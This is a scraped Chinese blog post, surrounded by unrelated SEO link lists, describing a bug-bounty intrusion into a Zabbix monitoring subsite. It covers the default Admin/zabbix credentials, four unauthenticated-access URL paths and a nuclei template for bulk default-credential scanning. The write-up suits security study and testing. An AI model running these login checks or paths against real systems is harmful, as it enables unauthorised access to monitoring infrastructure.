当前位置: 首页 > news >正文

网站建设意义和目的建个企业网站收费

网站建设意义和目的,建个企业网站收费,成都官网搭建公司,我想投资谁有项目找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下 使用谷歌搜索历史漏洞:zabbix漏洞 通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令 成功进去了,挖洞就是这么简单 搜索文章还…

找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下

使用谷歌搜索历史漏洞:zabbix漏洞


通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令


 


成功进去了,挖洞就是这么简单

搜索文章还报过未授权访问漏洞,打一波

 
  1. /overview.php?ddreset=1
  2. /srv_status.php?ddreset=1
  3. /latest.php?ddreset=1
  4. /zabbix.php?action=problem.view&ddreset=1


又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入


不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface

顺便写了一个nuclei批量默认密码验证脚本

【Nuclei-Poc】

 
  1. id: zabbix-default-credential-check
  2. info:
  3. name: Zabbix Default Credential Check
  4. author:
  5. severity: high
  6. description: Check for default credentials in Zabbix.
  7. tags: zabbix,default,cred
  8. requests:
  9. - method: POST
  10. path:
  11. - "{{BaseURL}}/zabbix/index.php"
  12. body: |
  13. name=Admin&password=zabbix&autologin=1&enter=Sign+in
  14. headers:
  15. Content-Type: application/x-www-form-urlencoded
  16. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  17. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  18. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  19. Accept-Encoding: gzip, deflate
  20. Connection: close
  21. Upgrade-Insecure-Requests: 1
  22. Origin: "{{BaseURL}}"
  23. Referer: "{{BaseURL}}/zabbix/"
  24. matchers-condition: and
  25. matchers:
  26. - type: word
  27. words:
  28. - "Location: zabbix.php?action=dashboard.view"
  29. part: header
  30. - type: status
  31. status:
  32. - 302

【验证】

.\nuclei -l xx.txt -t xx.yaml

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

http://www.yayakq.cn/news/596521/

相关文章:

  • 免费网站seowordpress 404 调用
  • 云南省建设造价协会网站苏州建设网站的公司
  • 做啥英文网站赚钱2012服务器如何做网站
  • 赣州晒房网门户网站wordpress漏洞破解
  • 学校学生网站模板下载wordpress 外链统计
  • 站酷设计网站官网入口文字设计焦作网站建设哪家正规
  • 网站建设海之睿做微课常用的网站有哪些
  • 网站之家广州机械网站建设外包
  • 大连手机自适应网站建设软件管理软件哪个好
  • 深圳网站关键词优化公司成都做小程序
  • 代做效果图的网站好网站开发技术有
  • jsp系统网站建设带源代码做一个页面网站需要多少钱
  • 网站建设栏目怎么介绍wordpress到服务器
  • 网站模版二建转注辽宁建设主管部门网站
  • 上海商城网站怎样做网站外部链接
  • 网站建设交接协议书建网站要多少钱呢
  • 备案 网站服务类型游戏搭建平台
  • 建设网站公司谁家好上海庭院景观设计公司
  • 在线教学网站建设现在网站后台有哪几种模板形式
  • 建设网站的总结地图截选做分析图的网站
  • 软膜做网站有用吗网站建设过程
  • 网站建设做的好项城网站建设
  • 建设一个网站需要哪些材料小型网站的建设与开发
  • 深圳网站制作长沙哪个网站做国际生意
  • 网站城市切换如何做iis7.0网站错误代码解决
  • 大型电商网站开发价格wordpress 欢迎插件
  • 网站备案邮寄资料网站建设公司目标客户
  • 旅游网站制作素材建筑论坛
  • 做视频包的网站有哪些代发百度帖子包收录排名
  • wordpress上传安装包站内seo优化